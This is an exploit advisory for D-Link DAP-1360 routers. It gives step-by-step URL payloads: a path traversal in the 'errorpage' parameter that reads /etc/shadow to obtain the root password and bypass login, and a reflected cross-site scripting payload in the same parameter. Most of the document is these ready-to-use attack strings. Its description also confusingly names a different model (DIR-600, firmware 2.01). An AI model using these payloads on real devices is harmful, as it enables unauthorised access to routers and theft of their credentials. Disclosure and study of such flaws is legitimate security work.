D-link DAP-1360 exploit

1. # Exploit Title: D-Link DAP-1360 File path traversal and Cross site scripting[reflected] can lead to Authentication Bypass easily.
2. # Date: 20-07-2018
3. # Exploit Author: r3m0t3nu11
4. # Contact : http://twitter.com/r3m0t3nu11
5. # Vendor : www.dlink.com
6. # Version: Hardware version: F1
7. Firmware version: 6.O5
8. # Tested on:All Platforms
9.  
10.  
11. 1) Description
12.  
13. After Successfully Connected to D-Link DIR-600
14. Router(FirmWare Version : 2.01), Any User Can Bypass The Router's
15. Root password as well bypass admin panel.
16.  
17. D-Link DAP-1360 devices with v6.x firmware allow remote attackers to
18. read passwords via a errorpage paramater which lead to absolute path traversal attack,
19.  
20. Its More Dangerous when your Router has a public IP with remote login
21. enabled.
22.  
23.  
24. IN MY CASE,
25. Tested Router IP : http://192.168.70.69/
26.  
27.  
28.  
29. Video POC : https://www.dropbox.com/s/tvpq2jm3jv48j3c/D-link.mov?dl=0
30.  
31. 2) Proof of Concept
32.  
33. Step 1: Go to
34. Router Login Page : http://192.168.70.69:80
35.  
36. Step 2:
37. Add the payload to URL.
38.  
39. Payload: getpage=html%2Findex.html&errorpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
40.  
41.  
42.  
43. Now u can get root password by reading /etc/shadow.
44.  
45. 2- XSS
46. Step 1: Go to
47. Router Login Page : http://192.168.70.69:80
48.  
49. Step 2:
50. Add the payload to URL.
51.  
52. Payload: getpage=html%2Findex.html&errorpage=<Script>alert('r3m0t3nu11')</script>&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=dd&%3Aaction=login&%3Asessionid=3a6a085
53.  
54. u will get r3m0t3nu11 name pop up as reflected xss
55.  
56. Greetz to : Samir Hadji,0n3,C0ld Z3r0,alm3refh group,0x30 team,zero way team.